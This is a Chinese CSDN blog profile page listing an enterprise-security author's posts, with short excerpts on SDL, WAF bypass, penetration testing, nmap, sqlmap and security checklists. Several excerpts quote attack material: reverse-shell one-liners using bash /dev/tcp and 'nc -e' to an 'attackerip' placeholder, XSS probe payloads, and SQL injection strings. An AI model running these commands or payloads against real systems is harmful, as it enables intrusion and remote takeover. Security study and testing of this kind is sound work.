企业信息安全
码龄15年
关注
提问 私信
  • 博客:120,083
    120,083
    总访问量
  • 12
    原创
  • 2,314,161
    排名
  • 55
    粉丝
  • 0
    铁粉

个人简介:挑战自我

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:上海市
  • 加入CSDN时间: 2009-08-24
博客简介:

专注企业信息安全-sec

博客描述:
专注企业信息安全
查看详细资料
个人成就
  • 获得42次点赞
  • 内容获得7次评论
  • 获得238次收藏
创作历程
  • 1篇
    2021年
  • 1篇
    2020年
  • 13篇
    2019年
  • 29篇
    2018年
成就勋章
TA的专栏
  • GR
  • 其他工具命令
    1篇
  • 企业信息安全
    11篇
  • Web安全漏洞
    16篇
  • IOT物联网安全
  • 安全工具
    14篇
  • web安全基础
    18篇
  • 坑
    1篇
  • 开源工具
    2篇
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

安全开发生命周期(SDL)

安全开发生命周期(SDL)是一个帮助开发人员构建更安全的软件和解决安全合规要求的同时降低开发成本的软件开发过程。 安全应用从安全设计开始,软件的安全问题很大一部分是由于不安全的设计而引入的,微软用多年的经验总结出了安全开发生命周期(SDL),并提出了攻击面最小化、STRIDE威胁建模等多种方法辅助安全人员对软件进行安全设计。安全设计对于软件安全的重要性尤为可见。一、安全开发生命周期(SDL)是什么?SDL介绍安全开发生命周期(SDL)即Security Development Lifecyc
转载
发布博客 2021.12.02 ·
7460 阅读 ·
5 点赞 ·
0 评论 ·
29 收藏

XSS现代WAF规则探测及绕过技术

初始测试1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;3、尝试以下的payload<script>alert(1);</script><script>prompt(1);</script><
转载
发布博客 2020.09.28 ·
687 阅读 ·
2 点赞 ·
0 评论 ·
2 收藏

反弹shell与生成shell

反弹shell0x01 bash 版本:bash -i >& /dev/tcp/attackerip/1234 0>&1注意这个是由解析 shell 的 bash 完成,所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。0x02 nc 版本:支持 - e 选项nc -e /bin/sh attackerip 1234这个方式最...
原创
发布博客 2019.12.04 ·
973 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

详细的渗透思路(转Mr-xn)

信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站ba...
转载
发布博客 2019.10.06 ·
5507 阅读 ·
6 点赞 ·
0 评论 ·
31 收藏

常用的Linux命令

如下是一份 Linux 机器的渗透测试备忘录,是在后期开发期间或者执行命令注入等操作时的一些典型命令,设计为测试人员进行本地枚举检查之用。命令 描述 netstat -tulpn 在 Linux 中显示对应了进程ID(PID)的网络端口。 watch ss -stplu 通过套接字实时观察 TCP, UDP 端口。 lsof -i 显示确认了的连接。...
原创
发布博客 2019.10.05 ·
282 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

XSS 绕过waf 姿势

https://www.cnblogs.com/wintrysec/p/10874980.html1.使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marque...
转载
发布博客 2019.06.25 ·
2144 阅读 ·
2 点赞 ·
1 评论 ·
0 收藏

ModSecurity规则

中文译文参考:http://netsecurity.51cto.com/art/201407/446264.htm英文原文参考:http://resources.infosecinstitute.com/configuring-modsecurity-firewall-owasp-rules/根据最新实践调整里面的细节内容,图片内容未调整:0x00 背景ModSecurity...
转载
发布博客 2019.05.04 ·
5753 阅读 ·
1 点赞 ·
0 评论 ·
6 收藏

nmap常用命令以及脚本

转载自:http://www.4hou.com/technology/10481.html还有freebuf系列的文章都挺好https://www.cnblogs.com/MacoLee/articles/5714165.html4种常用的扫描1.nmap -sP 1.1.1.1/24探测C段存活主机,可以用 |grep up 过滤存活的主机2. nmap -sS 1.1....
转载
发布博客 2019.04.15 ·
3782 阅读 ·
5 点赞 ·
0 评论 ·
27 收藏

sql注入payload

分享一些平时测试用的sql payloads1:BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...
转载
发布博客 2019.04.12 ·
3955 阅读 ·
3 点赞 ·
0 评论 ·
22 收藏

sqlmap命令3

当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、...
转载
发布博客 2019.04.11 ·
1157 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

sqlmap命令2

sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询...
转载
发布博客 2019.04.11 ·
885 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

sqlmap命令

cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...
转载
发布博客 2019.04.11 ·
1537 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

渗透测试工具实战技巧合集

最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略# 主机发现,生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现,发现大部分常用端口#...
转载
发布博客 2019.03.23 ·
965 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

分享国外安全团队及工具

名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
原创
发布博客 2019.03.19 ·
15674 阅读 ·
6 点赞 ·
0 评论 ·
63 收藏

人物-携程凌云

冬日的上午,安在CEO张耀疆和我在上海凌空SOHO携程办公区,见到了携程信息安全高级总监凌云。 初见凌云,清瘦的身形,秀气的容貌,还有一嗓子洪亮的话音,完全是一个二十多岁的小伙子。然而出乎我意料的是,凌云说他已经在奔四的道路上一去不复返,着实吓了我一跳。他又笑称可能他天性乐观,所以岁月这把杀猪刀在他脸上留了情。 我看也是,乐观的人,连时间都能对他柔情万种。   ...
转载
发布博客 2019.01.18 ·
1432 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

常规服务器安全检测备忘录

安全检查项 推荐工具 Nginx配置安全 gixy Nginx目录权限检查 手工 Apache日志安全检测 apache-scalp PHP配置文件安全检测 pcc 主机安全审计 lynis rootkit木马检查 chkrootkit;rootkit hunter 系统用户排查 手工,注意高权限和无需密码账号 线上代...
转载
发布博客 2018.12.27 ·
367 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

安全测试CheckList

权限系统保证全部资源都使用HTTPS 登出之后销毁会话ID 密码重置后需要销毁所有活跃会话 使用httponly Cookies 密码找回等无需登录的场景下下达到用户认证字符串必须是该场景单独使用的,须确保无法在其他任何场景完成认证 敏感场景,如下但不限于:登录,注册,发表话题等,是否存在验证码,验证码强度是否足够,验证码接口是否安全,若无验证码,是否有频率限制或其他人机验证方式 ...
转载
发布博客 2018.12.27 ·
853 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

安全信息守则

1.Do 规范1.1 General Security 通用安全条目 执行人 负责人 被访者应确保访客在前台登记访客信息,并在办公区域内需有人全程陪同 前台;相关对接人员 行政跟进 只有在得到IT人员的授权后,访客携带的电脑,手机才能连入公司网络 前台;相关对接技术负责任;运维技术部 行政跟进 公共wifi由IT运维部跟进 工作相关的任...
转载
发布博客 2018.12.27 ·
539 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

论安全的“闭环“和KPI

最近发现了一个怪现象甲方做安全的,总是有人会搞一堆看起来很高大上的东西,或者就是一堆没有落地的,没有闭环的安全产品,或是拿改一改的开源产品,但是自己也不清楚一些指标或是具体的使用细节的产品.比如,挂着各种头衔的产品在换了关键人物之后便处于弃用状态, 或者总喜欢做一些当前很难落地或者根本也不考虑能否落地的东西,这些产品大多会用到机器学习等,还会有一个酷炫的名字.然鹅最核心的指标,安全能力,或...
转载
发布博客 2018.12.27 ·
1189 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

关于安全产品的“联动”

最近一直在做NIDS,已有雏形,甚是欣慰,但是还是有很多问题.NIDS的本质是通过流量中发现异常行为,可能是明显的webshell通讯,恶意软件通讯,可能是奇奇怪怪的对外/对内连接.在这个层面上的确可以发现非加密的各种安全问题,但是我们会发现一些NIDS本身很难优化的地方.1.发现了异常连接(如DB Server主动的对外HTTP请求,且该Web Server非公司资产)2.发现了外部...
转载
发布博客 2018.12.27 ·
1121 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多